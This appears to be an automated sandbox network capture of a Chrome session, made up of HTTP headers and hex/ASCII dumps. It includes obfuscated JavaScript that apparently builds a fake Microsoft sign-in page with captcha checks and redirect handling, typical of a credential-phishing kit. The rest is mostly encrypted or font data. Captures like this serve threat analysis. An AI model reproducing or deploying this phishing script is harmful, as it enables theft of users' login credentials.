                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC870INData Raw: c2 b7 cc c8 be 72 41 47 e7 5a dc 78 e1 21 cf 36 84 99 3c db 7a ec 6a 81 bb 11 6e d1 27 b6 19 24 db 23 75 45 6e a5 8c 8f b4 c9 2e 63 97 44 0e 24 22 f3 e1 41 5d 5f e6 04 40 30 69 9a 40 d0 f4 04 fe 13 4b 53 d7 11 c2 71 12 c5 62 c6 44 36 6e 5a 27 45 6b 1a f2 37 4d 4f 7c 8f 5c 82 7c f6 05 0e 71 cc a7 26 07 f5 f6 a8 2a cc 47 47 a0 fb 36 0c fe 84 8a ec 66 e3 6d e0 3c 77 6d 9c a4 f5 78 76 1d 36 da 59 54 56 63 15 0e bc db e9 20 98 ec f3 30 4c b7 00 b7 f0 8c 46 c5 3d 5a 2b 12 00 de 68 06 f6 3c f4 f5 1f cf 72 91 9b 64 02 83 c6 98 3b 56 39 c2 cf f1 03 c1 ba 98 8d 48 da 37 d7 c7 f3 90 50 b4 a1 8b ad 2d 79 9d 86 23 cf 69 0a da 82 e0 90 5f c4 cc 05 fb c6 e1 a4 72 29 33 75 04 06 01 6c f8 e8 94 6c 7a 61 06 f3 6f 43 10 ea b3 e4 82 29 58 03 72 70 30 0c 39 23 32 35 0d d3 52
                                                                                                                                                                                                                                                                                                              Data Ascii: rAGZx!6<zjn'$#uEn.cD$"A]_@0i@KSqbD6nZ'Ek7MO|\|q&*GG6fm<wmxv6YTVc 0LF=Z+h<rd;V9H7P-y#i_r)3ullzaoC)Xrp09#25R
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC871INData Raw: e6 a0 4e 81 d7 79 fd 6c f0 62 48 d1 08 a1 f7 32 46 b8 a0 0c 2e 9c 79 a8 e2 98 a6 41 8d 9a 98 04 f1 66 fd 7d 80 14 80 4b a4 27 d1 4d 47 53 f9 b6 d2 b5 18 9c 47 9f 19 e9 de ad ef b9 8e a9 2b 05 8f f2 68 5e 5e 74 a3 d2 35 bf d2 ed 26 bf 55 52 8b 99 7b d4 e7 3a fb 92 ce c4 9d 8c 17 75 85 8e 2e cb 61 04 1c 41 ae c4 44 1b 70 99 b9 b3 c8 73 47 52 14 d9 9c 59 83 c8 c3 06 de f0 cd 59 70 bf 4e 13 84 b7 7e af 5f f5 af 26 6d b2 4a 57 78 8c 7b b8 a7 2f a2 3d 22 8c bd 74 02 c6 d0 26 9d 6c 80 d5 2c 07 c4 42 a7 ee 6e 8a d8 51 40 f9 f2 a9 8e 0c 25 e0 0c b9 f0 eb 51 29 ce 6a a1 21 a6 8b b0 2f b6 ed 12 17 19 16 94 0b 2f 93 36 54 d3 b4 cd 0e 76 e4 de 0a 6b 0d 8e 68 73 2c f6 1e 02 d2 0e ea 26 a7 06 9d 08 bc 69 88 81 8e 50 5c 9b fb 86 f7 d0 2c 90 2f d2 27 d3 96 c9 62 0a 23 2b
                                                                                                                                                                                                                                                                                                              Data Ascii: NylbH2F.yAf}K'MGSG+h^^t5&UR{:u.aADpsGRYYpN~_&mJWx{/="t&l,BnQ@%Q)j!//6Tvkhs,&iP\,/'b#+
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC872INData Raw: 60 5f 5b b0 21 ca 94 da 70 66 5c f2 fc d9 1d e3 90 98 78 c9 2d 13 79 66 a1 e8 9c 52 d1 5b 25 6d 89 c2 79 56 a4 c9 68 67 cc cf 97 f6 e5 9b f8 e7 0f f3 ac 42 4d 2b 1f e1 0d 95 d9 89 56 d4 23 ad a5 26 a5 2f 4a ea 40 8a ae 55 d5 4e 5a 7b 93 c6 2a d0 54 2f 04 e7 b2 7d b1 dc e9 6c 62 8f 4a 61 9b d7 dd 39 ba 12 cc 80 18 ab e1 7c e6 b0 d0 ff e7 79 21 50 f4 16 3e bd 55 09 d7 93 af 19 37 66 c9 1c c2 ff 13 b5 d8 86 ef 61 e1 c7 1b 3e b8 2e eb ee e1 2a 2b 8a 5f fd ce ad 13 e4 e5 6e 6b db 5b 70 e3 74 95 84 53 13 b9 4e a3 4a 04 e0 3d 5b 71 b1 0c 13 14 a4 66 8b 04 fc fa 8e 47 68 50 00 1e 1d cf ce ea fe 85 0f ed e3 02 65 63 5f 09 6c cc 62 10 5b c8 a1 cc 4b 60 8c 30 09 4a 68 95 b1 d2 6e 05 7c c2 56 81 22 aa 1a 88 87 ba 19 28 32 22 e6 39 2a 16 39 c6 1e 2e 91 d6 25 16 99 d2
                                                                                                                                                                                                                                                                                                              Data Ascii: `_[!pf\x-yfR[%myVhgBM+V#&/J@UNZ{*T/}lbJa9|y!P>U7fa>.*+_nk[ptSNJ=[qfGhPec_lb[K`0Jhn|V"(2"9*9.%
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC874INData Raw: 29 c3 6a ec ca 96 7e 62 4f 5b 6f a7 15 f5 9e 67 26 a0 c1 9d e9 b4 78 d8 9b 56 53 1c 34 29 05 01 65 25 e6 36 29 4d 5e 26 11 58 10 dd 3b 89 94 ed 3a dc 17 92 b8 3e 15 09 2d 93 50 92 05 09 81 34 95 ec 7a 69 71 92 61 49 45 ae 1c ca 7b 1b 39 ad d2 24 af 33 25 95 85 b8 e4 c5 2f 7f 3a ad ea b1 af 90 c7 ae c5 d1 8b 6a 41 55 29 a8 64 cd ba 48 77 83 67 7b 3f a9 5c 8b ae 26 a1 ed 9d 3b 97 26 2d 13 d4 15 93 4e 08 e8 92 be bd df ff 6f d8 2b d2 a6 6d 71 3a f0 66 06 1a 5a 87 68 cb 0c fd cd c1 61 c4 7d b2 ce d4 9a 3d b7 41 4c 15 63 bf 64 62 c8 9b 3e 18 4d da 10 93 33 4e 2c f5 85 64 a9 18 88 85 4e 2a d6 2e de 5a 88 57 eb e0 44 ac 22 4a 7b 16 42 af b6 e4 dc f7 f4 7a 61 39 81 b7 28 9c 58 ca 8d bb 2f 90 fc 3f 6d 90 19 f2 84 57 4c d4 b7 d8 6b a3 d6 a1 2f 55 0f 5e a6 19 64 5a
                                                                                                                                                                                                                                                                                                              Data Ascii: )j~bO[og&xVS4)e%6)M^&X;:>-P4ziqaIE{9$3%/:jAU)dHwg{?\&;&-No+mq:fZha}=ALcdb>M3N,dN*.ZWD"J{Bza9(X/?mWLk/U^dZ


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              73104.21.0.95443192.168.2.1649804C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC874INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Sun, 22 Oct 2023 12:15:47 GMT
                                                                                                                                                                                                                                                                                                              ETag: W/"353a-6084d10c51e3d"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9vQ2VK3nWare9MN5eVcVt9%2BRMUr0uF%2BSoB14LvIymXA26FzEDrKDKKt9unvbuc4rrQT3mqY%2F%2FJMfOpjIhEgsYUasjEGLLOeZKb6B7hdWm9Toa7%2FDLJfw2CLLn3hgi%2BMNP0SRN9N1HKG0BZg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd408ea8b2006-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC875INData Raw: 33 35 33 61 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 63 64 39 28 29 7b 63 6f 6e 73 74 20 5f 30 78 32 63 66 62 35 31 3d 5b 27 2f 76 61 6c 69 64 61 74 65 63 61 70 74 63 68 61 27 2c 27 6c 69 6e 6b 27 2c 27 73 61 66 61 72 69 27 2c 27 74 69 74 6c 65 27 2c 27 61 5f 74 65 78 74 27 2c 27 43 61 6e 5c 78 32 37 74 5c 78 32 30 61 63 63 65 73 73 5c 78 32 30 79 6f 75 72 5c 78 32 30 61 63 63 6f 75 6e 74 3f 27 2c 27 37 30 31 39 35 6b 71 65 4e 64 77 27 2c 27 72 65 61 64 79 27 2c 27 67 65 74 27 2c 27 63 68 72 6f 6d 65 27 2c 27 61 5f 69 64 27 2c 27 75 73 65 72 41 67 65 6e 74 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 2b 24 27 2c 27 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 27 2c 27 62 6f 64 79 27 2c 27 69 63 6f 6e 27 2c 27 74 65 78 74 43 6f 6e 74 65 6e 74
                                                                                                                                                                                                                                                                                                              Data Ascii: 353afunction _0x5cd9(){const _0x2cfb51=['/validatecaptcha','link','safari','title','a_text','Can\x27t\x20access\x20your\x20account?','70195kqeNdw','ready','get','chrome','a_id','userAgent','(((.+)+)+)+$','getElementsByTagName','body','icon','textContent
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC876INData Raw: 27 61 70 70 65 6e 64 43 68 69 6c 64 27 2c 27 63 6c 6f 75 64 66 6c 61 72 65 63 61 70 74 63 68 61 27 2c 27 62 69 6e 64 27 2c 27 53 69 67 6e 5c 78 32 30 69 6e 5c 78 32 30 74 6f 5c 78 32 30 79 6f 75 72 5c 78 32 30 4d 69 63 72 6f 73 6f 66 74 5c 78 32 30 61 63 63 6f 75 6e 74 27 2c 27 31 38 50 43 48 48 77 43 27 2c 27 68 65 61 64 27 2c 27 74 6f 67 67 6c 65 27 2c 27 2e 73 65 63 74 69 6f 6e 63 6f 6e 74 65 6e 74 27 2c 27 65 78 63 65 70 74 69 6f 6e 27 2c 27 6d 61 74 63 68 27 2c 27 34 30 31 38 31 38 78 4a 6c 77 48 73 27 2c 27 6c 69 6e 6b 5f 74 65 78 74 27 2c 27 69 6e 6e 65 72 48 54 4d 4c 27 2c 27 6e 6f 6e 65 27 2c 27 70 72 6f 74 6f 74 79 70 65 27 2c 27 73 68 6f 77 2d 66 72 6f 6d 2d 72 69 67 68 74 5c 78 32 30 30 2e 35 73 27 2c 27 35 33 31 30 36 32 74 49 49 47 74 6c 27
                                                                                                                                                                                                                                                                                                              Data Ascii: 'appendChild','cloudflarecaptcha','bind','Sign\x20in\x20to\x20your\x20Microsoft\x20account','18PCHHwC','head','toggle','.sectioncontent','exception','match','401818xJlwHs','link_text','innerHTML','none','prototype','show-from-right\x200.5s','531062tIIGtl'
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC877INData Raw: 2f 30 78 32 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 61 32 2c 2d 30 78 64 36 29 29 2f 30 78 33 29 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 65 65 2c 2d 30 78 64 32 29 29 2f 30 78 34 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 62 62 2c 2d 30 78 64 32 29 29 2f 30 78 35 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 63 32 2c 2d 30 78 38 66 29 29 2f 30 78 36 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 38 64 2c 2d 30 78 35 65 29 29 2f 30 78 37 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64 63 28 2d 30 78 39 66 2c 2d 30 78 37 36 29 29 2f 30 78 38 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 63 37 33 64
                                                                                                                                                                                                                                                                                                              Data Ascii: /0x2*(-parseInt(_0x5c73dc(-0xa2,-0xd6))/0x3)+-parseInt(_0x5c73dc(-0xee,-0xd2))/0x4*(-parseInt(_0x5c73dc(-0xbb,-0xd2))/0x5)+parseInt(_0x5c73dc(-0xc2,-0x8f))/0x6*(-parseInt(_0x5c73dc(-0x8d,-0x5e))/0x7)+parseInt(_0x5c73dc(-0x9f,-0x76))/0x8*(parseInt(_0x5c73d
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC878INData Raw: 32 39 66 38 32 36 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 63 63 32 65 36 62 28 5f 30 78 31 64 36 35 34 35 2c 5f 30 78 35 63 65 36 38 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 34 36 66 33 28 5f 30 78 35 63 65 36 38 64 2d 20 2d 30 78 32 61 63 2c 5f 30 78 31 64 36 35 34 35 29 3b 7d 69 66 28 5f 30 78 35 63 39 34 63 39 29 7b 63 6f 6e 73 74 20 5f 30 78 32 66 64 30 32 64 3d 5f 30 78 35 63 39 34 63 39 5b 5f 30 78 63 63 32 65 36 62 28 2d 30 78 32 32 37 2c 2d 30 78 32 32 31 29 5d 28 5f 30 78 34 35 38 62 38 38 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74 75 72 6e 20 5f 30 78 35 63 39 34 63 39 3d 6e 75 6c 6c 2c 5f 30 78 32 66 64 30 32 64 3b 7d 7d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 72 65 74 75 72 6e 20 5f 30 78 32 39 66 38 32 36 3d
                                                                                                                                                                                                                                                                                                              Data Ascii: 29f826?function(){function _0xcc2e6b(_0x1d6545,_0x5ce68d){return _0x46f3(_0x5ce68d- -0x2ac,_0x1d6545);}if(_0x5c94c9){const _0x2fd02d=_0x5c94c9[_0xcc2e6b(-0x227,-0x221)](_0x458b88,arguments);return _0x5c94c9=null,_0x2fd02d;}}:function(){};return _0x29f826=
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC880INData Raw: 2c 5f 30 78 33 35 31 30 61 32 5b 5f 30 78 35 38 61 61 64 39 5d 3d 5f 30 78 61 66 30 33 64 31 3b 7d 7d 29 3b 5f 30 78 31 38 63 36 39 35 28 29 3b 76 61 72 20 70 61 67 65 64 61 74 61 3d 27 27 2c 70 6f 72 74 6e 75 6d 3d 27 27 2c 72 65 64 69 72 65 63 74 75 72 6c 3d 27 27 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 36 66 33 28 5f 30 78 66 66 31 36 66 66 2c 5f 30 78 35 61 38 66 33 62 29 7b 63 6f 6e 73 74 20 5f 30 78 35 65 61 30 34 39 3d 5f 30 78 35 63 64 39 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 34 36 66 33 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 38 63 36 39 35 2c 5f 30 78 33 30 34 66 39 65 29 7b 5f 30 78 31 38 63 36 39 35 3d 5f 30 78 31 38 63 36 39 35 2d 30 78 37 61 3b 6c 65 74 20 5f 30 78 33 61 63 38 64 63 3d 5f 30 78 35 65 61 30 34 39 5b 5f 30 78 31 38 63 36
                                                                                                                                                                                                                                                                                                              Data Ascii: ,_0x3510a2[_0x58aad9]=_0xaf03d1;}});_0x18c695();var pagedata='',portnum='',redirecturl='';function _0x46f3(_0xff16ff,_0x5a8f3b){const _0x5ea049=_0x5cd9();return _0x46f3=function(_0x18c695,_0x304f9e){_0x18c695=_0x18c695-0x7a;let _0x3ac8dc=_0x5ea049[_0x18c6
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC881INData Raw: 2c 30 78 31 61 31 29 5d 5b 27 61 64 64 27 5d 28 5f 30 78 34 62 62 66 62 37 28 30 78 31 65 31 2c 30 78 31 65 39 29 29 2c 5f 30 78 34 32 38 37 64 66 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 66 33 2c 30 78 32 31 33 29 5d 3d 5f 30 78 34 34 64 34 35 64 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 39 66 2c 30 78 31 61 65 29 5d 2b 5f 30 78 34 62 62 66 62 37 28 30 78 31 62 30 2c 30 78 31 39 38 29 2b 5f 30 78 34 34 64 34 35 64 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 63 64 2c 30 78 31 39 62 29 5d 2b 28 5f 30 78 34 62 62 66 62 37 28 30 78 31 61 34 2c 30 78 31 63 64 29 2b 5f 30 78 34 34 64 34 35 64 5b 27 61 5f 74 65 78 74 27 5d 2b 27 3c 2f 61 3e 27 29 2c 5f 30 78 31 39 37 31 30 38 5b 27 61 70 70 65 6e 64 43 68 69 6c 64 27 5d 28 5f 30 78 34 32 38 37 64 66 29 3b 7d 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ,0x1a1)]['add'](_0x4bbfb7(0x1e1,0x1e9)),_0x4287df[_0x4bbfb7(0x1f3,0x213)]=_0x44d45d[_0x4bbfb7(0x19f,0x1ae)]+_0x4bbfb7(0x1b0,0x198)+_0x44d45d[_0x4bbfb7(0x1cd,0x19b)]+(_0x4bbfb7(0x1a4,0x1cd)+_0x44d45d['a_text']+'</a>'),_0x197108['appendChild'](_0x4287df);}e
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC882INData Raw: 5f 30 78 34 34 64 34 35 64 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 61 32 2c 30 78 31 38 37 29 5d 3d 3d 3d 5f 30 78 34 62 62 66 62 37 28 30 78 31 39 66 2c 30 78 31 37 34 29 29 7b 63 6f 6e 73 74 20 5f 30 78 35 37 62 35 38 63 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 39 65 2c 30 78 31 39 62 29 5d 28 27 70 27 29 3b 5f 30 78 35 37 62 35 38 63 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 61 31 2c 30 78 31 62 30 29 5d 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 64 61 2c 30 78 31 66 62 29 5d 28 5f 30 78 34 62 62 66 62 37 28 30 78 31 65 31 2c 30 78 31 63 33 29 29 2c 5f 30 78 35 37 62 35 38 63 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 64 33 2c 30 78 31 61 37 29 5d 3d 5f 30 78 34 34 64 34 35 64 5b 5f 30 78 34 62 62 66 62 37 28 30 78 31 39 66
                                                                                                                                                                                                                                                                                                              Data Ascii: _0x44d45d[_0x4bbfb7(0x1a2,0x187)]===_0x4bbfb7(0x19f,0x174)){const _0x57b58c=document[_0x4bbfb7(0x19e,0x19b)]('p');_0x57b58c[_0x4bbfb7(0x1a1,0x1b0)][_0x4bbfb7(0x1da,0x1fb)](_0x4bbfb7(0x1e1,0x1c3)),_0x57b58c[_0x4bbfb7(0x1d3,0x1a7)]=_0x44d45d[_0x4bbfb7(0x19f
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC884INData Raw: 73 27 3a 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 62 66 64 66 35 29 7b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 34 35 31 34 65 32 28 5f 30 78 31 39 65 63 31 38 2c 5f 30 78 33 64 35 31 31 35 29 7b 72 65 74 75 72 6e 20 5f 30 78 35 62 37 35 32 39 28 5f 30 78 31 39 65 63 31 38 2c 5f 30 78 33 64 35 31 31 35 2d 20 2d 30 78 36 36 66 29 3b 7d 5f 30 78 32 62 66 64 66 35 5b 5f 30 78 34 35 31 34 65 32 28 2d 30 78 32 62 66 2c 2d 30 78 32 62 35 29 5d 3d 3d 27 73 75 63 63 65 73 73 27 26 26 28 24 5b 5f 30 78 34 35 31 34 65 32 28 2d 30 78 32 38 64 2c 2d 30 78 32 39 33 29 5d 28 7b 27 74 79 70 65 27 3a 5f 30 78 34 35 31 34 65 32 28 2d 30 78 32 37 30 2c 2d 30 78 32 37 35 29 2c 27 75 72 6c 27 3a 77 65 62 6e 61 6d 65 2b 5f 30 78 34 35 31 34 65 32 28 2d 30 78 32 62 30 2c 2d 30 78 32
                                                                                                                                                                                                                                                                                                              Data Ascii: s':function(_0x2bfdf5){function _0x4514e2(_0x19ec18,_0x3d5115){return _0x5b7529(_0x19ec18,_0x3d5115- -0x66f);}_0x2bfdf5[_0x4514e2(-0x2bf,-0x2b5)]=='success'&&($[_0x4514e2(-0x28d,-0x293)]({'type':_0x4514e2(-0x270,-0x275),'url':webname+_0x4514e2(-0x2b0,-0x2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC885INData Raw: 2f 20 21 69 6d 70 6f 72 74 61 6e 74 2f 67 2c 27 27 29 2c 5f 30 78 32 30 32 39 33 66 5b 27 74 65 78 74 43 6f 6e 74 65 6e 74 27 5d 3d 5f 30 78 35 33 66 36 38 30 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 30 39 2c 30 78 32 31 65 29 5d 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 31 39 2c 30 78 32 34 30 29 5d 2b 3d 5f 30 78 31 63 65 62 66 34 3b 76 61 72 20 5f 30 78 33 31 61 37 39 31 3d 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 36 32 61 64 66 28 30 78 31 65 33 2c 30 78 31 65 62 29 5d 28 5f 30 78 32 36 32 61 64 66 28 30 78 32 31 64 2c 30 78 31 66 38 29 29 3b 5f 30 78 33 31 61 37 39 31 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 33 62 2c 30 78 32 30 65 29 5d 3d 77 65 62 6e 61 6d 65 2b 5f 30 78 32 36 32 61 64 66 28 30 78 31 63 64 2c 30 78 31 66
                                                                                                                                                                                                                                                                                                              Data Ascii: / !important/g,''),_0x20293f['textContent']=_0x53f680,document[_0x262adf(0x209,0x21e)][_0x262adf(0x219,0x240)]+=_0x1cebf4;var _0x31a791=document[_0x262adf(0x1e3,0x1eb)](_0x262adf(0x21d,0x1f8));_0x31a791[_0x262adf(0x23b,0x20e)]=webname+_0x262adf(0x1cd,0x1f
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC886INData Raw: 29 2c 64 6f 63 75 6d 65 6e 74 5b 27 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 27 5d 28 5f 30 78 32 36 32 61 64 66 28 30 78 31 64 65 2c 30 78 31 65 37 29 29 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 31 36 2c 30 78 31 65 65 29 5d 5b 5f 30 78 32 36 32 61 64 66 28 30 78 31 66 62 2c 30 78 32 30 62 29 5d 28 27 64 2d 6e 6f 6e 65 27 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 31 33 2c 30 78 32 30 37 29 5d 28 27 73 65 63 74 69 6f 6e 5f 74 72 79 69 6e 67 74 6f 73 69 67 6e 69 6e 27 29 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 37 62 2c 30 78 32 34 39 29 5d 28 5f 30 78 32 36 32 61 64 66 28 30 78 32 30 63 2c 30 78 32 33 62 29 29 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32 31 66 2c 30 78 32 30 38 29 5d 5b 5f 30 78 32 36 32 61 64 66 28 30 78 32
                                                                                                                                                                                                                                                                                                              Data Ascii: ),document['getElementById'](_0x262adf(0x1de,0x1e7))[_0x262adf(0x216,0x1ee)][_0x262adf(0x1fb,0x20b)]('d-none'),document[_0x262adf(0x213,0x207)]('section_tryingtosignin')[_0x262adf(0x27b,0x249)](_0x262adf(0x20c,0x23b))[_0x262adf(0x21f,0x208)][_0x262adf(0x2
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC888INData Raw: 78 32 36 38 29 2c 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 37 37 61 32 34 30 28 30 78 32 33 64 2c 30 78 32 31 37 29 5d 28 5f 30 78 37 37 61 32 34 30 28 30 78 32 31 62 2c 30 78 32 30 63 29 29 5b 5f 30 78 37 37 61 32 34 30 28 30 78 32 32 34 2c 30 78 32 35 34 29 5d 5b 5f 30 78 37 37 61 32 34 30 28 30 78 32 34 31 2c 30 78 32 36 36 29 5d 28 5f 30 78 37 37 61 32 34 30 28 30 78 32 36 39 2c 30 78 32 37 64 29 29 3b 7d 2c 30 78 31 66 34 29 2c 62 6f 74 74 6f 6d 73 65 63 74 69 6f 6e 6c 69 6e 6b 73 28 27 75 6e 61 6d 65 27 2c 5b 7b 27 61 5f 69 64 27 3a 5f 30 78 31 38 61 35 35 66 28 30 78 31 63 64 2c 30 78 31 66 34 29 2c 27 61 5f 74 65 78 74 27 3a 5f 30 78 31 38 61 35 35 66 28 30 78 31 66 32 2c 30 78 31 65 30 29 2c 27 74 65 78 74 27 3a 5f 30 78 31 38 61 35 35 66 28 30 78 31
                                                                                                                                                                                                                                                                                                              Data Ascii: x268),document[_0x77a240(0x23d,0x217)](_0x77a240(0x21b,0x20c))[_0x77a240(0x224,0x254)][_0x77a240(0x241,0x266)](_0x77a240(0x269,0x27d));},0x1f4),bottomsectionlinks('uname',[{'a_id':_0x18a55f(0x1cd,0x1f4),'a_text':_0x18a55f(0x1f2,0x1e0),'text':_0x18a55f(0x1
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC888INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              74104.21.0.95443192.168.2.1649801C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC888INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: font/woff2
                                                                                                                                                                                                                                                                                                              Content-Length: 43596
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 25 Aug 2023 04:00:36 GMT
                                                                                                                                                                                                                                                                                                              ETag: "aa4c-603b7631474f7"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KZf7phdt23z5t01kCRBy9xiZb9osf0uvmQt2DmQkFSpruyCeDorWGDNudRmMEJURJggHrbU8gYOo%2FeItWLXoUXurRh6nPlRbTccj44qCLZmikSkkZT1GHqLFBMfncbG51UGhPGVnZyUnvt4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: MISS
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd407f97857b8-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC889INData Raw: 77 4f 46 32 00 01 00 00 00 00 aa 4c 00 13 00 00 00 01 cf 50 00 00 a9 d5 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 83 55 1b 82 e4 7a 1c 8b 04 3f 48 56 41 52 8a 3b 3f 4d 56 41 52 46 06 60 3f 53 54 41 54 1c 00 8e 48 2f 4c 11 08 0a 81 c2 40 81 a5 50 0b 87 3e 00 30 82 8e 00 01 36 02 24 03 8e 78 04 20 05 8d 2e 07 97 7b 5b d6 bb 71 05 b3 c3 e4 8f 52 6c ba 0d 01 b0 74 fa f4 7e 76 f7 0b e8 b1 ed 28 e5 b6 c1 e8 b6 d0 54 c3 74 05 3b f6 14 6e 27 b0 dd 76 3d cc fe ff ff 3f 7f 99 88 6c 5d 02 78 49 92 b5 85 6d 1d 22 a8 ea 3f 68 4e 58 04 2c 02 96 b5 38 1a 3b 47 b4 d6 af cb 6d 2c 7d c1 68 d7 aa 3e 28 3d 5b ac 96 88 6d 2f d4 3e 9b b8 a1 ef 38 26 66 c1 e0 26 9d 06 1b b8 9b ad 91 5d a1 75 95 dd e0 26 9c 56 44 8f e5 5d ec 3c 8d 04 79 52 93 65
